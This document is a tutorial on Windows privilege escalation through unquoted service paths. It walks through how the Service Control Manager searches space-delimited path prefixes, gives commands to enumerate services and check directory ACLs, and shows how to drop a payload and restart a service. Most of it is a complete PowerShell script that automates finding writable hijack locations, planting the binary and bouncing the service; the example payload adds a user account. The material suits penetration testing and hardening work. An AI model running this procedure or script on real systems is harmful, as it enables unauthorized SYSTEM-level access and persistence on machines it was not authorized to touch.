We can exploit unquoted service paths when we have write permission to a directory that Windows searches before the service's real binary. If the service's binary path contains spaces but isn't wrapped in quotes, the Service Control Manager doesn't know where the executable name ends, so it tries each space-delimited prefix of the path (with .exe appended) before the full path. If we can drop our own binary at one of those earlier locations, it runs as the service account (often LocalSystem) instead of the intended binary.

For the unquoted path C:\Program Files\My Program\my service\my.exe, Windows checks these locations in this order and runs the first one that exists:

C:\Program.exe
C:\Program Files\my.exe
C:\Program Files\My Program\my.exe
C:\Program Files\My Program\my service\my.exe

We first need to enumerate services (running and stopped) together with their binary paths.

Get-CimInstance -ClassName win32_service | Select Name,State,PathName

The output lists every service with its PathName. Any path that contains spaces and is not surrounded by quotes is a potential target.

You can also enumerate these with WMI (wmic is deprecated on current Windows builds but is still present on many hosts):

wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

# returns services whose binary lives outside C:\Windows\ and whose path has no quotes. These are the candidates for unquoted service path abuse; a hit is only exploitable if the path also contains a space and we can write to one of the directories on the search path.

We also need to confirm that we can start the service (and stop it, if it is already running), and that we have permission to write to one of the directories Windows searches before the real binary.

Start-Service ServiceName
# succeeds only if our account is allowed to start the service. If we can't start it but StartMode is Auto, our binary will still be picked up at the next reboot.

icacls "C:\Program Files\MyApplication"
# check the ACL of the directory that holds the next search candidate. Look for (M), (W) or (F) granted to Everyone, Authenticated Users, BUILTIN\Users or our own account.

We then copy our binary into that directory, named after the search candidate: filename.exe must be the first word of the next path component plus .exe (for C:\Program Files\MyApplication\My Service\svc.exe that would be My.exe), otherwise Windows will never look for it.


copy .\exploit.exe 'C:\Program Files\MyApplication\filename.exe'

Start-Service servicename
# (re)starts the service so the SCM walks the search order and executes our binary. Stop the service first if it is already running.

net user
# in this example the payload adds a user. Check even if Start-Service reported an error: a payload that isn't a real service executable never reports back to the SCM, so the start "fails" (typically error 1053) after the payload has already run.

Once the service has been restarted, we verify that the payload had the intended effect, then remove the dropped binary so the service goes back to its original executable.
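The whole procedure above (enumerate, compute the search candidates, test writability, drop the payload and bounce the service) as a single PowerShell script. This is an added example and not code from the original notes; the function names, the probe-file writability check, the parameter names and the usage paths are my own assumptions.

```powershell
# Added example, not from the original notes. Function names, the probe-file
# writability check and the usage paths are assumptions of this example.

function Test-DirectoryWritable {
    # Try to create and delete a throwaway file; an actual write is more
    # reliable than reasoning about inherited ACLs by hand.
    param([Parameter(Mandatory)][string]$Path)

    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path -Path $Path -ChildPath ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    # Emits one object per (service, search candidate) pair, flagged Writable
    # when the current user can drop a file in the candidate's directory.
    [CmdletBinding()]
    param([switch]$IncludeWindowsDir)

    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        $p = $svc.PathName
        if (-not $p -or $p.StartsWith('"')) { return }   # quoted or empty: not vulnerable
        if (-not $IncludeWindowsDir -and $p -match '^[A-Za-z]:\\Windows\\') { return }

        # Drop any arguments: keep the text up to and including the first ".exe".
        $m = [regex]::Match($p, '^(.+?\.exe)', 'IgnoreCase')
        $exe = if ($m.Success) { $m.Groups[1].Value } else { $p }
        if ($exe -notmatch ' ') { return }               # no space, nothing to hijack

        # Each space-delimited prefix + ".exe" is tried before the real binary.
        $tokens = $exe -split ' '
        for ($i = 0; $i -lt $tokens.Count - 1; $i++) {
            $candidate = ($tokens[0..$i] -join ' ') + '.exe'
            $dir = Split-Path -Path $candidate -Parent
            [PSCustomObject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                State     = $svc.State
                StartMode = $svc.StartMode
                PathName  = $p
                Candidate = $candidate
                Writable  = Test-DirectoryWritable -Path $dir
            }
        }
    }
}

function Invoke-UnquotedPathHijack {
    # Drop the payload at the chosen candidate and bounce the service.
    param(
        [Parameter(Mandatory)][string]$ServiceName,
        [Parameter(Mandatory)][string]$Payload,     # e.g. .\exploit.exe
        [Parameter(Mandatory)][string]$Candidate    # a Writable candidate from above
    )

    Copy-Item -LiteralPath $Payload -Destination $Candidate -Force

    if ((Get-Service -Name $ServiceName).Status -eq 'Running') {
        Stop-Service -Name $ServiceName -Force -ErrorAction SilentlyContinue
    }
    try {
        Start-Service -Name $ServiceName -ErrorAction Stop
    } catch {
        # A payload that is not a real service binary never reports to the SCM,
        # so Start-Service fails (typically error 1053) after the payload already ran.
        Write-Warning "Start-Service failed: $($_.Exception.Message)"
    }
    # Verify the effect (e.g. net user), then delete $Candidate to clean up.
}

# Usage (service name and paths are placeholders for this example):
#   Get-UnquotedServicePath | Where-Object Writable | Format-Table -AutoSize
#   Invoke-UnquotedPathHijack -ServiceName 'MyService' -Payload .\exploit.exe `
#       -Candidate 'C:\Program Files\MyApplication\My.exe'
```

The enumeration deliberately tests writability by creating and deleting a file rather than parsing icacls output, because inherited and deny entries make manual ACL reading error-prone. The hijack function catches the Start-Service failure instead of treating it as a dead end, since a non-service payload always trips the SCM timeout even when it has done its job.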